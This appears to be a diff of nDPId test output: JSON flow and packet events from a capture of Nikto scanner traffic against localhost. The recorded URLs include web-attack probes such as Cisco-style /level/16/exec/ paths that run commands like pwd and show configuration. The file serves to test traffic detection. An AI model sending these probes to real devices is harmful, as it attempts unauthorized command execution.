+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277561,"flow_last_seen":1576420277561,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277561,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50664,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/Program%20Files\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001165)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277562,"flow_last_seen":1576420277562,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277562,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_packet_id":1,"flow_last_seen":1576420277562,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277562,"pkt":"AAAAAAAAAAAAAAAACABFAADAFKZAAEAGJ5B\/AAABfwAAAcXqH5AjeyxLwwFcDYAYAED+tAAAAQEICp1m\/mKdZv5iR0VUIC9zbXNzZW5kLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY2KQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277562,"flow_last_seen":1576420277562,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277562,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50666,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/smssend.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001166)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277562,"flow_last_seen":1576420277562,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277562,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50666,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/smssend.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001166)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277564,"flow_last_seen":1576420277564,"flow_idle_time":7440000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"ts_msec":1576420277564,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_packet_id":1,"flow_last_seen":1576420277564,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"ts_msec":1576420277564,"pkt":"AAAAAAAAAAAAAAAACABFAADYoI5AAEAGm49\/AAABfwAAAcXsH5AgHJhkU1YzMYAYAED+zAAAAQEICp1m\/mOdZv5jR0VUIC9wbHMvc2ltcGxlZGFkL2FkbWluXy9kYWRlbnRyaWVzLmh0bSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277564,"flow_last_seen":1576420277564,"flow_idle_time":7440000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"ts_msec":1576420277564,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50668,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pls\/simpledad\/admin_\/dadentries.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001167)"}}
+01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277564,"flow_last_seen":1576420277564,"flow_idle_time":7440000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"ts_msec":1576420277564,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50668,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pls\/simpledad\/admin_\/dadentries.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001167)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277565,"flow_last_seen":1576420277565,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420277565,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_packet_id":1,"flow_last_seen":1576420277565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1576420277565,"pkt":"AAAAAAAAAAAAAAAACABFAADKFqFAAEAGJYt\/AAABfwAAAcXuH5Ag7S5xgHE61oAYAED+vgAAAQEICp1m\/mWdZv5lR0VUIC9sZXZlbC8xNi9leGVjLy0vLy9wd2QgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI1MykNCg0K"}
-00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277565,"flow_last_seen":1576420277565,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420277565,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50670,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/-\/\/\/pwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001253)"}}
+01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277565,"flow_last_seen":1576420277565,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420277565,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50670,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/-\/\/\/pwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001253)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277566,"flow_last_seen":1576420277566,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"ts_msec":1576420277566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_packet_id":1,"flow_last_seen":1576420277566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"ts_msec":1576420277566,"pkt":"AAAAAAAAAAAAAAAACABFAADZY3pAAEAG2KJ\/AAABfwAAAcXwH5Bf2FuYp3IH4oAYAED+zQAAAQEICp1m\/madZv5mR0VUIC9sZXZlbC8xNi9leGVjLy0vLy9zaG93L2NvbmZpZ3VyYXRpb24gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNTQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277566,"flow_last_seen":1576420277566,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"ts_msec":1576420277566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50672,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/-\/\/\/show\/configuration","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001254)"}}
+01082{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277566,"flow_last_seen":1576420277566,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"ts_msec":1576420277566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50672,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/-\/\/\/show\/configuration","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001254)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277567,"flow_last_seen":1576420277567,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277567,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":1,"flow_last_seen":1576420277567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277567,"pkt":"AAAAAAAAAAAAAAAACABFAAC9ybtAAEAGcn1\/AAABfwAAAcXyH5BbOPFKogxutoAYAED+sQAAAQEICp1m\/medZv5nR0VUIC9sZXZlbC8xNiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjU1KQ0KDQo="}
-00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277567,"flow_last_seen":1576420277567,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277567,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50674,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001255)"}}
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277567,"flow_last_seen":1576420277567,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277567,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50674,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001255)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277568,"flow_last_seen":1576420277568,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277568,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_packet_id":1,"flow_last_seen":1576420277568,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420277568,"pkt":"AAAAAAAAAAAAAAAACABFAADDBTJAAEAGNwF\/AAABfwAAAcX0H5Cobz3BWm\/3E4AYAED+twAAAQEICp1m\/midZv5oR0VUIC9sZXZlbC8xNi9leGVjLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjU2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277568,"flow_last_seen":1576420277568,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277568,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50676,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001256)"}}
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277568,"flow_last_seen":1576420277568,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277568,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50676,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001256)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277570,"flow_last_seen":1576420277570,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"ts_msec":1576420277570,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_packet_id":1,"flow_last_seen":1576420277570,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"ts_msec":1576420277570,"pkt":"AAAAAAAAAAAAAAAACABFAADVrDFAAEAGj+9\/AAABfwAAAcX2H5DQ55TgYEZuMYAYAED+yQAAAQEICp1m\/mqdZv5qR0VUIC9sZXZlbC8xNi9leGVjLy9zaG93L2FjY2Vzcy1saXN0cyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI1NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277570,"flow_last_seen":1576420277570,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"ts_msec":1576420277570,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50678,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/\/show\/access-lists","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001257)"}}
+01076{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277570,"flow_last_seen":1576420277570,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"ts_msec":1576420277570,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50678,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/\/show\/access-lists","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001257)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277572,"flow_last_seen":1576420277572,"flow_idle_time":7440000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":1,"ts_msec":1576420277572,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_packet_id":1,"flow_last_seen":1576420277572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"ts_msec":1576420277572,"pkt":"AAAAAAAAAAAAAAAACABFAADf3g5AAEAGXgh\/AAABfwAAAcX4H5Dm0Ob+nlg5uYAYAED+0wAAAQEICp1m\/mydZv5sR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L2NvbmZpZ3VyYXRpb24gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI1OCkNCg0K"}
-00899{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277572,"flow_last_seen":1576420277572,"flow_idle_time":7440000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":1,"ts_msec":1576420277572,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50680,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/configuration","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001258)"}}
